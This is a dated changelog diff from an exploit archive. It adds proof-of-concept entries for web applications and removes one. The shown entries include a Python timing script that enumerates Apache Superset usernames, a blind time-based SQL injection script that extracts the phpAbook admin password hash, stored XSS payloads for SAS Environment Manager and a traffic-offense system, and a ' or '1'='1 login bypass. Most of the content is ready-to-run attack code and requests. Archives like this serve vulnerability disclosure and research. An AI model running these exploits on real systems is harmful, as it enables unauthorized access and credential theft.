DB: 2021-07-01

6 changes to exploits/shellcodes

SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS)
Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)
phpAbook 0.9i - SQL Injection
Apache Superset 1.1.0 - Time-Based Account Enumeration
Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)

exploits/multiple/webapps/50067.txt

@@ -1,28 +0,0 @@
-# Exploit Title: SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS)
-# Date: 24/06/2021
-# Exploit Author: Luqman Hakim Zahari @ Saitamang
-# Vendor Homepage: https://support.sas.com/en/software/environment-manager-support.html
-# Version: 2.5
-# Tested on: CentOS 7
-# CVE : CVE-2021-35475
-
-# Description #
-
-SAS® Environment Manager 2.5 allows XSS through the Name field when creating/editing a server. The XSS will prompt when editing the Configuration Properties.
-
-# Proof of Concept(PoC) # https://github.com/saitamang/CVE-2021-35475/blob/main/README.md
-
-*Steps to Reproduce:*
-
-[1.] Login to your system > On "Resource" tab > "Browse""
-[2.] Choose a "Platform"
-[3.] Click "Inventory" tab > Under "Servers" tab click "New..."
-[4.] Under "General Properties" tab on "Name" field , enter the payload(below) > Filled up other information and click "Ok" button
-
-payload : 
-
-name=XSS"><marquee onstart=confirm('XSS')>@SAITAMANG
-
-[5.] Successfully saved the payload page will shown
-[6.] Then scroll down to bottom under "Configuration Properties" tab > click "Edit" button
-[7.] Then the payload will be executed

exploits/multiple/webapps/50072.py

@@ -0,0 +1,64 @@
+# Exploit Title: Apache Superset 1.1.0 - Time-Based Account Enumeration
+# Author: Dolev Farhi
+# Date: 2021-05-13
+# Vendor Homepage: https://superset.apache.org/
+# Version: 1.1.0
+# Tested on: Ubuntu
+
+import sys
+import requests
+import time
+
+scheme = 'http'
+host = '192.168.1.1'
+port = 8080
+
+# change with your wordlist
+usernames = ['guest', 'admin', 'administrator', 'idontexist', 'superset']
+
+url = '{}://{}:{}'.format(scheme, host, port)
+login_endpoint = '/login/'
+
+session = requests.Session()
+
+def get_csrf():
+  token = None
+  r = session.get(url + login_endpoint, verify=False)
+
+  for line in r.text.splitlines():
+    if 'csrf_token' in line:
+      try:
+        token = line.strip().split('"')[-2]
+      except:
+        pass
+  return token
+
+csrf_token = get_csrf()
+
+if not csrf_token:
+  print('Could not obtain CSRF token, the exploit will likely fail.')
+  sys.exit(1)
+
+data = {
+  'csrf_token':csrf_token,
+  'username':'',
+  'password':'abc'
+}
+
+attempts = {}
+found = False
+
+for user in usernames:
+  start = time.time()
+  data['username'] = user
+  r = session.post(url + login_endpoint, data=data, verify=False, allow_redirects=True)
+  roundtrip = time.time() - start
+  attempts["%.4f" % roundtrip] = user
+
+print('[!] Accounts existence probability is sorted from high to low')
+
+count = 0
+
+for key in sorted(attempts, reverse=True):
+  count += 1
+  print("%s. %s (timing: %s)" % (count, attempts[key], key))

exploits/multiple/webapps/50073.txt

@@ -0,0 +1,38 @@
+# Exploit Title: Simple Traffic Offense System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS)
+# Date: 30-06-2021
+# Exploit Author: Barış Yıldızoğlu
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/trafic.zip
+# Version: 1.0
+# Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3
+
+# Description: Almost all inputs contain Stored XSS on the website
+
+Request:
+
+POST /Trafic/save-reported.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
+Firefox/78.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 168
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/Trafic/report-offence.php
+Cookie: PHPSESSID=vbsq5n2m09etst1mfcmq84gifo
+Upgrade-Insecure-Requests: 1
+
+offence_id={Payload here}&vehicle_no={Payload here}&driver_license={Payload
+here}&name={Payload here}&address={Payload here}&gender={Payload
+here}&officer_reporting={Payload here}&offence={Payload here}
+
+
+# Steps to Reproduce:
+[1.] Login to the system [+] username=Torrahclef&pass=yemiyemi
+[2.] Go to the Report Offense page
+[3.] Send the request above with the Stored XSS payload
+[4.] Dashboard and Offense list pages will be triggered

exploits/php/webapps/50071.py

@@ -0,0 +1,38 @@
+# Exploit Title: phpAbook 0.9i - SQL Injection
+# Date: 2021-06-29
+# Vendor Homepage: http://sourceforge.net/projects/phpabook/
+# Exploit Author: Said Cortes, Alejandro Perez
+# Version: v0.9i
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+
+import requests
+import argparse
+import string
+import sys
+
+
+def exploit(session,host):
+    print("Starting Exploit\nSearching Admin Hash...")
+    passwordhash = ''
+    for i in range(1,33):
+        charset = string.digits + string.ascii_lowercase
+        for letter in charset:
+            burp0_url = f"{host}/index.php"
+            burp0_data = {"auth_user": f"admin'-IF((SELECT MID(password,{i},1) from ab_auth_user where uid=1)='{letter}',SLEEP(3),0)#", "auth_passwd": "admin", "lang": "en", "submit": "Login"}
+            try:
+                session.post(burp0_url, data=burp0_data, timeout=1)
+            except requests.Timeout:
+                passwordhash += letter
+                continue
+    print("admin:"+passwordhash)
+        
+
+                
+    
+if __name__ == "__main__" :
+    session = requests.session()
+    parser = argparse.ArgumentParser()
+    parser.add_argument("-u","--url",help="host url \nex: http://127.0.0.1/phpabook",required=True)
+    arg = parser.parse_args()
+    exploit(session,arg.url)

exploits/php/webapps/50074.txt

@@ -0,0 +1,14 @@
+# Exploit Title: Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)
+# Date: 06/30/2021
+# Exploit Author: Murat DEMIRCI (butterflyhunt3r)
+# Vendor Homepage: https://www.codester.com/
+# Software Link: https://www.codester.com/items/31349/medisol-doctors-patients-managment-system
+# Version: 1.0
+# Tested on: Windows 10
+# Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication.
+
+# Proof of Concept :
+http://test.com/PATH/signin
+
+# Username : anything
+# Password : ' or '1'='1

files_exploits.csv

@@ -44207,6 +44207,9 @@ id,file,description,date,author,type,platform,port
 50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",2021-06-25,"Barış Yıldızoğlu",webapps,php,
 50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,
 50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",2021-06-28,"Toby Jackson",webapps,php,
-50067,exploits/multiple/webapps/50067.txt,"SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS)",2021-06-28,"Luqman Hakim Zahari",webapps,multiple,
+50074,exploits/php/webapps/50074.txt,"Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)",2021-06-30,"Murat DEMİRCİ",webapps,php,
 50068,exploits/macos/webapps/50068.txt,"Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)",2021-06-28,Captain_hook,webapps,macos,
 50069,exploits/hardware/webapps/50069.py,"Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)",2021-06-28,"Bryan Leong",webapps,hardware,
+50071,exploits/php/webapps/50071.py,"phpAbook 0.9i - SQL Injection",2021-06-30,"Alejandro Perez",webapps,php,
+50072,exploits/multiple/webapps/50072.py,"Apache Superset 1.1.0 - Time-Based Account Enumeration",2021-06-30,"Dolev Farhi",webapps,multiple,
+50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,